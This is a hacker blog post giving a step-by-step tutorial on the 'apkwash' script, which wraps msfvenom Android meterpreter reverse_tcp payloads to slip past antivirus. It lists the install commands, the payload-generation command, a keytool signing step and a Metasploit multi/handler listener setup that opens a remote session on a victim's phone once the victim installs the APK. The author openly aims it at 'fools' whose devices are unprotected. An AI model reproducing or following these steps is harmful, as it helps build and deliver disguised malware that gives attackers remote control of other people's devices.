Monday, April 8, 2019

Apkwash android antivirus evasion for Msfvemon

Welcome back lads and gals hope you are all good 🙂 so what I’m going to show a simple trick to embed your msfvemon payloads this will help it bypass basic factory anti virus as we know lot of fools out there don’t have there devices safe so there for this method will work a treat.

What is Apk-wash ?

its a bash script msfvemon anti virus evasion by Jbreed git-hub found Here.

How to use

OK so lets start open terminal and type apt-get install git -y if u don’t already have it install as ‘I’m using Kali i don’t to install but I’m a nice guy here how u do it .
Hacking A Rise apt-installgit

Now we clone the dir from github so type this git clone https://github.com/Hackingriseofficial/apkwash.git or u can clone it from J boss github
git clone https://github.com/jbreed/apkwash.git
Hacking A Rise gitcloneapkwash
now when its finished you wanna change the dir on terminal to do this type cd apkwash then u want to type ls then after that type chmod +x apkwask now once u gave it permissions u want to move it to the bin folder to do this type this command mv apkwash /usr/local/bin
Hacking A Rise howtoinstall
now type cd to go back to root and clear the terminal by typing clear right now we have that set up on first run type apkwash -n this make a key store
Hacking A Rise fristruapkwash
now we are ready to make a payload so type this in to your terminal
apkwash -p android/meterpreter/reverse_tcp LHOST=127.0.0.1=LPORT=4444 -o Hackingarise.apk
Hacking A Rise makingpayload
now with till its done when its done type service postgersql start then msfconsole
Hacking A Rise startmsfconsole
now when it loads we wanna set it multi/handler so type use exploit/multi/handler then set payload android/meterpreter/reverse_tcp then set the lhost
set lhost 127.0.0.1 then the port set lport 4444 the lhost is your local host use ifconfig to find yours
Hacking A Rise setting-listner
one the target downloads the payload the session will create type sessions 1 to enter it and type help .

note

If u get a error that no keystore then type
root@laughingman:~# keytool -genkey -v -keystore release.keystore -alias hackingarise -keyalg RSA -keysize 2048 -validity 10000

Hacking A Rise keytool

right guys i hope u enjoyed it and HACK THE PLANET dont for get to sub to the blog so we can send u updates.
LAUGHING MAN OUT

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.